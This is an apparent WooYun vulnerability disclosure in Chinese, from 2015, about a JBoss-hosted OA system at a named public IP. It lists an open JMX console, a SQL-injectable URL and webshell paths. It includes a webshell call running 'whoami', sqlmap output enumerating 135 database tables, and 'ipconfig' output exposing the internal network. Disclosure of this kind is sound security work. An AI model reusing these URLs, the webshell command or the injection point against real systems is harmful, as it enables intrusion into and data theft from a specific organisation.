乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-27: 细节已通知厂商并且等待厂商处理中 2015-05-02: 厂商已经主动忽略漏洞,细节向公众公开
我是一条小青龙,我有许多小秘密,就不告诉你。。。
jboss越权:
http://110.80.10.170:8081/jmx-console/
SQL注入:
http://110.80.10.170:8081/oa/notneedlogin/checkusercodelevel.jsp?userid=admin
userid存在get注入部分webshell:http://110.80.10.170:8081/zmeu/cs.jsphttp://110.80.10.170:8081/zecmd/zecmd.jsp
管理员权限:http://110.80.10.170:8081/zecmd/zecmd.jsp?comment=whoami
SQLMAP结果:
Database: fjorgan[135 tables]+-------------------------+| ADDRESSLIST || ARTICLE || AUTHORIZEBASE || AUTHORIZEEXT || CALENDAR_EVENT || CATALOG || DIVINFO || DM_LX || DM_MX || EMPLOYEE_POSITION_TABLE || EMPLOYEE_TABLE || EMPLOYEE_TABLE_BAK || FUNMAPPING || FUNMAPPING_IN || FUNMAPPING_OUT || HIS_MESSAGE || INFOSYSTEM_TABLE || MENU_TABLE || MODULE || NDPARA || NIOPERATOR || NIPARA || NODEDEF || NODEINS || NODERELATION || NODERELATIONINS || ORGAN_TABLE || ORGAN_TABLEHIS || Organ_Structure || POLITYPOST || POLITYPOSTHIS || PORTAL_USER || PORTAL_USER_MODULES || PORTAL_USER_TABS || POSITION_RELATION_TABLE || POSITION_SYSTEM || POSITION_TABLE || POSITION_TABLEHIS || POST || POSTHIS || POS_ROLE_TABLE || PRODEF || PROINS || PROINSLOG || ROLE_MENU_TABLE || ROLE_TABLE || SEQ || SEQUENCE || SEQ_YWXH || SMSG || SMS_CONFIG || SMS_INIT || SMS_MAIL_COMPLETE || SMS_MAIL_CONFIG || SMS_MAIL_QUEUE || SMS_MAIL_SCHEME || SP_XX || SYSTEM_USERS || SYS_LOG || SYS_MESSAGE || TEMPEXCEL || TEMP_USERS || USER_FORBID || USER_ORGAN || USER_ROLE_TABLE || USER_SYSTEM || USER_TABLE || USER_TABLEHIS || USER_TABLEOTH || V_AUTHORIZE || V_EMPLOYEE_POSITION || V_EMPLOYEE_TABLE || V_FUNMAPPING || V_MESSAGE || V_MODULE || V_NIOPERATOR || V_NODEDEF || V_NODEINS || V_NODEINS_CUR || V_NODEINS_PASS || V_NODERELATION || V_NODERELATIONINS || V_OFFMODULE || V_POSITION_RELATION || V_PRODEF || V_ROLE_MENU || V_ROLE_MENU_TABLE || V_USERMENU_SELECT || V_USERS_FLOW || V_USER_MENU_ALL2 || V_USER_ROLE || V_USER_SYSTEM || V_syslog || WORKFLOWBASE || WORKFLOWNODE || WORKFLOWPARA || WORKFLOW_SAMPLE || ls || seq_wf || temp_organ || user_menu_table || user_menu_table_bak || v_all_menus || v_all_roles || v_authorizebase || v_authorizeext || v_employee || v_employee_position_yg || v_employee_user || v_nodedef_authorize || v_nodedef_flow || v_organ || v_organhis || v_politypost || v_polityposthis || v_pos_role || v_position || v_position_role || v_positionhis || v_post || v_posthis || v_proins || v_role_position || v_spxx || v_system || v_user_menu || v_user_menu_all || v_user_roles || v_userhis || v_users || v_users_wf || v_usersystem || v_workflow_sample || v_workflowbase || v_workflownode |+-------------------------+
内网ip,可进一步渗透:
Command: ipconfig /allWindows IP Configuration Host Name . . . . . . . . . . . . : cnooc-servers Primary Dns Suffix . . . . . . . : Node Type . . . . . . . . . . . . : Unknown IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : NoEthernet adapter ±¾µØÁ¬½Ó: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : IBM USB Remote NDIS Network Device Physical Address. . . . . . . . . : 5E-F3-FD-35-25-CB DHCP Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes IP Address. . . . . . . . . . . . : 169.254.95.120 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : DHCP Server . . . . . . . . . . . : 169.254.95.118 Lease Obtained. . . . . . . . . . : 2015Äê4ÔÂ27ÈÕ 15:10:26 Lease Expires . . . . . . . . . . : 2015Äê4ÔÂ27ÈÕ 15:30:26Ethernet adapter ÍâÍø: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client) #2 Physical Address. . . . . . . . . : 5C-F3-FC-DA-26-1A DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 192.168.10.1 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.10.249 DNS Servers . . . . . . . . . . . : 218.85.157.99
不深入了,脱裤和内网渗透都是体力活请立即下线,整改完毕后再上线,其它问题请自查,运维童鞋辛苦了!
危害等级:无影响厂商忽略
忽略时间:2015-05-02 15:46
漏洞Rank:15 (WooYun评价)
暂无